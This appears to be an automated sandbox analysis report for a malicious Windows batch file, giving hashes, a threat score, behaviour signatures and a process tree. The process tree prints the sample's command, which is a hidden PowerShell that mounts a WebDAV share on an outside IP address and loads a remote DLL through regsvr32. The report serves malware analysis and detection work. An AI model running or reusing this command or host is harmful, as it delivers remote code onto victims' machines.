Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    19/07/2024, 03:26 UTC

General

  • Target

    5e13d1b252311c680b84c1c87c7487bf7724609c9bf572b72db0a49168dbf156.bat

  • Size

    15KB

  • MD5

    bdf3d064c172015f3f49bbabc00c7e4a

  • SHA1

    3261d02778ef25bd8a3067f25d0c9f103100bcbe

  • SHA256

    5e13d1b252311c680b84c1c87c7487bf7724609c9bf572b72db0a49168dbf156

  • SHA512

    85a93a7fcdc0eb60ad360dc8c248c3aef6cbad3919933068e414276de1a60cf0cf842ca7b4514bb53e3aa0c027e8dd7becdad0698c03d53635459059411031af

  • SSDEEP

    384:BdQT+1v7GWrOQcqT+PTFWvgiD8AhRqdia4nIk1dtt7ttqjEFPx7s01f:bz1FfqUPDGGhXFZ401f

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\5e13d1b252311c680b84c1c87c7487bf7724609c9bf572b72db0a49168dbf156.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Program Files\Windows NT\Accessories\wordpad.exe
      "C:\Program Files\Windows NT\Accessories\wordpad.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:2576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\47312627127348.dll
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\
        3⤵
          PID:2804
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\47312627127348.dll
          3⤵
            PID:2724

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2944-23-0x000000001B540000-0x000000001B822000-memory.dmp

        Filesize

        2.9MB

      • memory/2944-24-0x00000000027F0000-0x00000000027F8000-memory.dmp

        Filesize

        32KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.